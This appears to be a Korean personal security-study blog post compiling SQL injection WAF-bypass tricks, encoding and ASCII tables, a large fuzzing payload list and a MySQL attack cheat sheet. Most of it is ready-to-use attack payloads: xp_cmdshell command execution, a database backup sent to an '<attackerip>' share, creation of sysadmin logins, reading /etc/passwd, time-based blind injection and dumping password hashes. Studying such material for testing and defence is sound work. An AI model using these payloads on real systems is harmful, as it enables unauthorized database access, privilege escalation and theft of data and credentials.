SQL INJECTION BYPASS WAF
1. 공백 대체
%09 : tab
%0a : line feed
%0b : vertical tab
%0c : form feed
%0d : carriage return
+ : space와 동일
/**/ : 주석, 내부에 임의의 문자열 삽입 가능
2. 사용 회피
() : 괄호
concat : 합성
1. 공백 문자 우회
1) Line Feed (\n)
- 커서(캐럿)를 다음 줄(현재 위치에서 바로 아래줄)로 이동시키는 개행 문자
- URL Encoding: %0a
- ex) no=1%0aor%0aid='admin'
2) Tab (\t)
- 커서를 한 tab만큼 이동시키는 문자
- URL Encoding: %09
- ex) no=1%09or%09id='admin'
3) Carrage Return (\r)
- 커서(캐럿)를 줄의 맨 앞(왼쪽)으로 이동시키는 개행 문자
- URL Encoding: %0d
- ex) no=1%0dor%0did='admin'
4) 주석 (/**/)
- ex) no=1/**/or/**/id='admin'
5) 괄호 ()
- ex) no=(1)or(id='admin')
6) 더하기 (+)
- ex) no=1+or+id='admin'
7) %0b, %0c, %a0
- 1~6까지의 모든 우회 방법이 먹히지 않을 경우 공백 대신 사용
- %a0은 잘 안먹히는 것 같으니 %0b나 %0c를 위주로 사용하자.
2. 논리 연산자, 비교 연산자 우회
1) OR 연산자
- ||
2) AND 연산자
- &&
- URL Encoding: %26%26
3) 등호(=)
① LIKE 연산자
- ex) id like "admin"
- 정규 표현식을 이용하여 쿼리문을 조작할 수도 있음 (ex. pw like "a%" → pw의 첫 번째 문자가 a이면 true)
② IN 연산자
- ex) id in ("admin")
③ instr(string $str, string $substr)
- ex) instr(id, "admin")
④ 부등호 (< , >)
- ex) length(pw) > 7 and length(pw) < 9
3. 함수 우회
1) str_replace(string $search, string $replace, string $subject)
- 필터링되는 문자열 사이에 문자열을 넣는다.
- ex) str_replace("admin", "", $_GET[id])
→ adadminmin 으로 입력하면 중간에 있는 admin이 공백으로 필터링되어 admin만 남게 된다.
2) substr(string $str, int $start, int $length)
- substring(string $str, int $start, int $length)
- mid(string $str, int $start, int $length)
3) ascii(string $str)
- ord(string $str): ascii 함수와 마찬가지로 문자열을 아스키코드 값으로 변환해줌
- hex(string $str): 문자열을 아스키코드 헥사값으로 변환해줌
ex) hex(substr(pw, 1, 1)) = hex(61)
4. 주석 처리
① --
- 뒤에 반드시 공백이 있어야 정상적으로 주석 처리가 된다.
- 한 줄만 주석처리한다.
② # (URL Encoding: %23)
- '--'처럼 뒤에 공백이 없어도 정상적으로 주석 처리된다.
- 한 줄만 주석 처리한다.
③ /* */
- /* */ 사이의 문자열들이 모두 주석 처리된다.
④ ;%00
- NULL 문자인 %00과 ;이 결합한 주석 처리 문자
5. 싱글 쿼터(') 우회
1) 더블 쿼터(") 사용
ex) id="admin"
2) 백슬래시(\) 사용
- select id from table where id='$_GET[id]' and pw='$_GET[pw]' 와 같은 쿼리문에 제한적으로 사용 가능
- ex) id='\' and pw=' or 1#' → \에 의해 바로 뒤에 있는 싱글쿼터(')가 문자로 인식됨
☞ '\' and pw'가 문자열로 인식되고 이 뒷부분부터는 쿼리문으로 인식됨
☞ 인자 전달: id=\&pw=%20or%201%23
첫 번째 - AND
1) &&
- url encoding: %26%26
두 번째 - OR
1) ||
세 번째 - 등호(=)
1) like 연산자
- 등호랑 똑같이 사용
- 추가로 pw like "a%", "%a%" , "%a" 와 같이 쿼리문에서 응용가능하다.
a가 해당 문자열 안에 있어도 참으로 반환
(순서대로 첫번째 문자가 a일 때, 문자열 안에 a가 들어있을 때, 마지막 문자가 a일 때)
2) in 연산자
- 등호 대신 in을 사용하고 ()를 사용하여 표현한다.
- ex) pw in ("1234")
3) instr 함수
- ex) instr(id,"admin")
4) 부등호 (< , >)
- 등호 대신 등식으로 표현
- ex) length(pw) = 8 ---> length(pw) > 7 and length(pw) <9
공백
|
%20
|
(
|
%28
|
:
|
%3A
|
[
|
%5B
|
`
|
%60
|
!
|
%21
|
)
|
%29
|
;
|
%3B
|
%5C
|
{
|
%7B
|
|
"
|
%22
|
*
|
%2A
|
<
|
%3C
|
]
|
%5D
|
|
|
%7C
|
#
|
%23
|
+
|
%2B
|
=
|
%3D
|
^
|
%5E
|
}
|
%7D
|
$
|
%24
|
,
|
%2C
|
>
|
%3E
|
_
|
%5F
|
~
|
%7E
|
%25
|
-
|
%2D
|
?
|
%3F
|
.
|
.
|
.
|
.
|
|
&
|
%26
|
.
|
%2E
|
@
|
%40
|
.
|
.
|
.
|
.
|
'
|
%27
|
/
|
%2F
|
.
|
.
|
.
|
.
|
.
|
.
|
[ASCII 코드표]
10진수16진수문자10진수16진수문자10진수16진수문자10진수16진수문자
0 | 0x00 | NUL | 32 | 0x20 | Space | 64 | 0x40 | @ | 96 | 0x60 | ` |
1 | 0x01 | SOH | 33 | 0x21 | ! | 65 | 0x41 | A | 97 | 0x61 | a |
2 | 0x02 | STX | 34 | 0x22 | " | 66 | 0x42 | B | 98 | 0x62 | b |
3 | 0x03 | ETX | 35 | 0x23 | # | 67 | 0x43 | C | 99 | 0x63 | c |
4 | 0x04 | EOT | 36 | 0x24 | $ | 68 | 0x44 | D | 100 | 0x64 | d |
5 | 0x05 | ENQ | 37 | 0x25 | % | 69 | 0x45 | E | 101 | 0x65 | e |
6 | 0x06 | ACK | 38 | 0x26 | & | 70 | 0x46 | F | 102 | 0x66 | f |
7 | 0x07 | BEL | 39 | 0x27 | ' | 71 | 0x47 | G | 103 | 0x67 | g |
8 | 0x08 | BS | 40 | 0x28 | ( | 72 | 0x48 | H | 104 | 0x68 | h |
9 | 0x09 | TAB | 41 | 0x29 | ) | 73 | 0x49 | I | 105 | 0x69 | i |
10 | 0x0A | LF | 42 | 0x2A | * | 74 | 0x4A | J | 106 | 0x6A | j |
11 | 0x0B | VT | 43 | 0x2B | + | 75 | 0x4B | K | 107 | 0x6B | k |
12 | 0x0C | FF | 44 | 0x2C | , | 76 | 0x4C | L | 108 | 0x6C | l |
13 | 0x0D | CR | 45 | 0x2D | - | 77 | 0x4D | M | 109 | 0x6D | m |
14 | 0x0E | SO | 46 | 0x2E | . | 78 | 0x4E | N | 110 | 0x6E | n |
15 | 0x0F | SI | 47 | 0x2F | / | 79 | 0x4F | O | 111 | 0x6F | o |
16 | 0x10 | DLE | 48 | 0x30 | 0 | 80 | 0x50 | P | 112 | 0x70 | p |
17 | 0x11 | DC1 | 49 | 0x31 | 1 | 81 | 0x51 | Q | 113 | 0x71 | q |
18 | 0x12 | DC2 | 50 | 0x32 | 2 | 82 | 0x52 | R | 114 | 0x72 | r |
19 | 0x13 | DC3 | 51 | 0x33 | 3 | 83 | 0x53 | S | 115 | 0x73 | s |
20 | 0x14 | DC4 | 52 | 0x34 | 4 | 84 | 0x54 | T | 116 | 0x74 | t |
21 | 0x15 | NAK | 53 | 0x35 | 5 | 85 | 0x55 | U | 117 | 0x75 | u |
22 | 0x16 | SYN | 54 | 0x36 | 6 | 86 | 0x56 | V | 118 | 0x76 | v |
23 | 0x17 | ETB | 55 | 0x37 | 7 | 87 | 0x57 | W | 119 | 0x77 | w |
24 | 0x18 | CAN | 56 | 0x38 | 8 | 88 | 0x58 | X | 120 | 0x78 | x |
25 | 0x19 | EM | 57 | 0x39 | 9 | 89 | 0x59 | Y | 121 | 0x79 | y |
26 | 0x1A | SUB | 58 | 0x3A | : | 90 | 0x5A | Z | 122 | 0x7A | z |
27 | 0x1B | ESC | 59 | 0x3B | ; | 91 | 0x5B | [ | 123 | 0x7B | { |
28 | 0x1C | FS | 60 | 0x3C | < | 92 | 0x5C | \ | 124 | 0x7C | | |
29 | 0x1D | GS | 61 | 0x3D | = | 93 | 0x5D | ] | 125 | 0x7D | } |
30 | 0x1E | RS | 62 | 0x3E | > | 94 | 0x5E | ^ | 126 | 0x7E | ~ |
31 | 0x1F | US | 63 | 0x3F | ? | 95 | 0x5F | _ | 127 | 0x7F | DEL |
SQL I Payload
# ms-sqli info disclosure payload fuzzfile
# replace regex with your fuzzer for best results <attackerip> <sharename>
# run wireshark or tcpdump, look for incoming smb or icmp packets from victim
# might need to terminate payloads with ;--
select @@version
select @@servernamee
select @@microsoftversione
select * from master..sysserverse
select * from sysusers
exec master..xp_cmdshell 'ipconfig+/all'
exec master..xp_cmdshell 'net+view'
exec master..xp_cmdshell 'net+users'
exec master..xp_cmdshell 'ping+<attackerip>'
BACKUP database master to disks='\\<attackerip>\<attackerip>\backupdb.dat'
create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.aspâ'" select * from myfile"--
# you will need to customize/modify some of the vaules in the queries for best effect
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
'create user name identified by 'pass123' --
'create user name identified by pass123 temporary tablespace temp default tablespace users;
' ; drop table temp --
'exec sp_addlogin 'name' , 'password' --
' exec sp_addsrvrolemember 'name' , 'sysadmin' --
' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --
' grant connect to name; grant resource to name; --
' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
' or 1=1 --
' union (select @@version) --
' union (select NULL, (select @@version)) --
' union (select NULL, NULL, (select @@version)) --
' union (select NULL, NULL, NULL, (select @@version)) --
' union (select NULL, NULL, NULL, NULL, (select @@version)) --
' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) --
1'1
1 exec sp_ (or exec xp_)
1 and 1=1
1' and 1=(select count(*) from tablenames); --
1 or 1=1
1' or '1'='1
)%20or%20('x'='x
%20or%201=1
; execute immediate 'sel' || 'ect us' || 'er'
benchmark(10000000,MD5(1))#
update
";waitfor delay '0:0:__TIME__'--
1) or pg_sleep(__TIME__)--
||(elt(-3+5,bin(15),ord(10),hex(char(45))))
"hi"") or (""a""=""a"
delete
like
" or sleep(__TIME__)#
pg_sleep(__TIME__)--
*(|(objectclass=*))
declare @q nvarchar (200) 0x730065006c00650063 ...
or 0=0 #
insert
1) or sleep(__TIME__)#
) or ('a'='a
; exec xp_regread
*|
@var select @var as var into temp end --
1)) or benchmark(10000000,MD5(1))#
asc
(||6)
"a"" or 3=3--"
" or benchmark(10000000,MD5(1))#
# from wapiti
or 0=0 --
1 waitfor delay '0:0:10'--
or 'a'='a
hi or 1=1 --"
or a = a
UNION ALL SELECT
) or sleep(__TIME__)='
)) or benchmark(10000000,MD5(1))#
hi' or 'a'='a
0
21 %
limit
or 1=1
or 2 > 1
")) or benchmark(10000000,MD5(1))#
PRINT
hi') or ('a'='a
or 3=3
));waitfor delay '0:0:__TIME__'--
a' waitfor delay '0:0:10'--
1;(load_file(char(47,101,116,99,47,112,97,115, ...
or%201=1
1 or sleep(__TIME__)#
or 1=1
and 1 in (select var from temp)--
or '7659'='7659
or 'text' = n'text'
--
or 1=1 or ''='
declare @s varchar (200) select @s = 0x73656c6 ...
exec xp
; exec master..xp_cmdshell 'ping 172.10.1.255'--
3.10E+17
" or pg_sleep(__TIME__)--
x' AND email IS NULL; --
&
admin' or '
or 'unusual' = 'unusual'
//
truncate
1) or benchmark(10000000,MD5(1))#
\x27UNION SELECT
declare @s varchar(200) select @s = 0x77616974 ...
tz_offset
sqlvuln
"));waitfor delay '0:0:__TIME__'--
||6
or%201=1 --
%2A%28%7C%28objectclass%3D%2A%29%29
or a=a
) union select * from information_schema.tables;
PRINT @@variable
or isNULL(1/0) /*
26 %
" or "a"="a
(sqlvuln)
x' AND members.email IS NULL; --
or 1=1--
and 1=( if((load_file(char(110,46,101,120,11 ...
0x770061006900740066006F0072002000640065006C00 ...
%20'sleep%2050'
as
1)) or pg_sleep(__TIME__)--
/**/or/**/1/**/=/**/1
union all select @@version--
,@variable
(sqlattempt2)
or (EXISTS)
t'exec master..xp_cmdshell 'nslookup www.googl ...
%20$(sleep%2050)
1 or benchmark(10000000,MD5(1))#
%20or%20''='
||UTL_HTTP.REQUEST
or pg_sleep(__TIME__)--
hi' or 'x'='x';
") or sleep(__TIME__)="
or 'whatever' in ('whatever')
; begin declare @var varchar(8000) set @var=' ...
union select 1,load_file('/etc/passwd'),1,1,1;
0x77616974666F722064656C61792027303A303A313027 ...
exec(@s)
) or pg_sleep(__TIME__)--
union select
or sleep(__TIME__)#
select * from information_schema.tables--
a' or 1=1--
a' or 'a' = 'a
declare @s varchar(22) select @s =
or 2 between 1 and 3
or a=a--
or '1'='1
|
or sleep(__TIME__)='
or 1 --'
or 0=0 #"
having
a'
" or isNULL(1/0) /*
declare @s varchar (8000) select @s = 0x73656c ...
â or 1=1 --
char%4039%41%2b%40SELECT
order by
bfilename
having 1=1--
) or benchmark(10000000,MD5(1))#
or username like char(37);
;waitfor delay '0:0:__TIME__'--
" or 1=1--
x' AND userid IS NULL; --
*/*
or 'text' > 't'
(select top 1
or benchmark(10000000,MD5(1))#
");waitfor delay '0:0:__TIME__'--
a' or 3=3--
-- &password=
group by userid having 1=1--
or ''='
; exec master..xp_cmdshell
%20or%20x=x
select
")) or sleep(__TIME__)="
0x730065006c0065006300740020004000400076006500 ...
hi' or 1=1 --
") or pg_sleep(__TIME__)--
%20or%20'x'='x
or 'something' = 'some'+'thing'
exec sp
29 %
(
ý or 1=1 --
1 or pg_sleep(__TIME__)--
0 or 1=1
) or (a=a
uni/**/on sel/**/ect
replace
%27%20or%201=1
)) or pg_sleep(__TIME__)--
%7C
x' AND 1=(SELECT COUNT(*) FROM tabname); --
'%20OR
; or '1'='1'
declare @q nvarchar (200) select @q = 0x770061 ...
1 or 1=1
; exec ('sel' + 'ect us' + 'er')
23 OR 1=1
/
anything' OR 'x'='x
declare @q nvarchar (4000) select @q =
or 0=0 --
desc
||'6
)
1)) or sleep(__TIME__)#
or 0=0 #
select name from syscolumns where id = (sele ...
hi or a=a
*(|(mail=*))
password:*/=1--
distinct
);waitfor delay '0:0:__TIME__'--
to_timestamp_tz
") or benchmark(10000000,MD5(1))#
UNION SELECT
%2A%28%7C%28mail%3D%2A%29%29
+sqlvuln
or 1=1 /*
)) or sleep(__TIME__)='
or 1=1 or ""=
or 1 in (select @@version)--
sqlvuln;
union select * from users where login = char ...
x' or 1=1 or 'x'='y
28 %
â or 3=3 --
@variable
or '1'='1'--
"a"" or 1=1--"
//*
%2A%7C
" or 0=0 --
")) or pg_sleep(__TIME__)--
?
or 1/*
!
'
or a = a
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
' or 1=1
or 1=1 --
x' OR full_name LIKE '%Bob%
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
'%20or%20''='
'%20or%20'x'='x
')%20or%20('x'='x
' or 0=0 --
' or 0=0 #
or 0=0 #"
' or 1=1--
' or '1'='1'--
' or 1 --'
or 1=1--
' or 1=1 or ''='
or 1=1 or ""=
' or a=a--
or a=a
') or ('a'='a
'hi' or 'x'='x';
or
procedure
handler
' or username like '%
' or uname like '%
' or userid like '%
' or uid like '%
' or user like '%
'; exec master..xp_cmdshell
'; exec xp_regread
t'exec master..xp_cmdshell 'nslookup www.google.com'--
--sp_password
' UNION SELECT
' UNION ALL SELECT
' or (EXISTS)
' (select top 1
'||UTL_HTTP.REQUEST
1;SELECT%20*
<>"'%;)(&+
'%20or%201=1
'sqlattempt1
%28
%29
%26
%21
' or ''='
' or 3=3
or 3=3 --
mySQL cheatsheet
Version SELECT @@version |
|
Comments SELECT 1; #comment SELECT /*comment*/1; |
|
Current User SELECT user(); SELECT system_user(); |
|
List Users SELECT user FROM mysql.user; — priv |
|
List Password Hashes SELECT host, user, password FROM mysql.user; — priv |
|
Password Cracker John the Ripper will crack MySQL password hashes. |
|
List Privileges SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; — list user privsSELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; — priv, list user privsSELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; — list privs on databases (schemas)SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; — list privs on columns |
|
List DBA Accounts SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘SUPER’;SELECT host, user FROM mysql.user WHERE Super_priv = ‘Y’; # priv |
|
Current Database SELECT database() |
|
List Databases SELECT schema_name FROM information_schema.schemata; — for MySQL >= v5.0 SELECT distinct(db) FROM mysql.db — priv |
|
List Columns SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ |
|
List Tables SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’ |
|
Find Tables From Column Name SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = ‘username’; — find table which have a column called ‘username’ |
|
Select Nth Row SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0 SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0 |
|
Select Nth Char SELECT substr(‘abcd’, 3, 1); # returns c |
|
Bitwise AND SELECT 6 & 2; # returns 2 SELECT 6 & 1; # returns 0 |
|
ASCII Value -> Char SELECT char(65); # returns A |
|
Char -> ASCII Value SELECT ascii(‘A’); # returns 65 |
|
Casting SELECT cast(‘1’ AS unsigned integer); SELECT cast(‘123’ AS char); |
|
String Concatenation SELECT CONCAT(‘A’,’B’); #returns AB SELECT CONCAT(‘A’,’B’,’C’); # returns ABC |
|
If Statement SELECT if(1=1,’foo’,’bar’); — returns ‘foo’ |
|
Case Statement SELECT CASE WHEN (1=1) THEN ‘A’ ELSE ‘B’ END; # returns A |
|
Avoiding Quotes SELECT 0x414243; # returns ABC |
|
Time Delay SELECT BENCHMARK(1000000,MD5(‘A’)); SELECT SLEEP(5); # >= 5.0.12 |
|
Make DNS Requests Impossible? |
|
Command Execution If mysqld (<5.0) is running as root AND you compromise a DBA account you can execute OS commands by uploading a shared object file into /usr/lib (or similar). The .so file should contain a User Defined Function (UDF). raptor_udf.c explains exactly how you go about this. Remember to compile for the target architecture which may or may not be the same as your attack platform. |
|
Local File Access …’ UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) — priv, can only read world-readable files. SELECT * FROM mytable INTO dumpfile ‘/tmp/somefile’; — priv, write to file system |
|
Hostname, IP Address SELECT @@hostname; |
|
Create Users CREATE USER test1 IDENTIFIED BY ‘pass1’; — priv |
|
Delete Users DROP USER test1; — priv |
|
Make User DBA GRANT ALL PRIVILEGES ON *.* TO test1@’%’; — priv |
|
Location of DB files SELECT @@datadir; |
|
Default/System Databases information_schema (>= mysql 5.0) mysql |
'정보 보안 해킹 공부 > SQL 인젝션' 카테고리의 다른 글
SQL injection 기본 종류 (0) | 2022.04.15 |
---|---|
[XSS]드림핵 (0) | 2022.02.23 |
[SQL 인젝션] Union, Logic (0) | 2022.02.21 |
[SQL 인젝션] LORD OF SQLINJECTION - cobolt 풀이 (0) | 2022.02.20 |
[SQL 인젝션] LORD OF SQLINJECTION - gremlin 풀이 (0) | 2022.02.20 |
댓글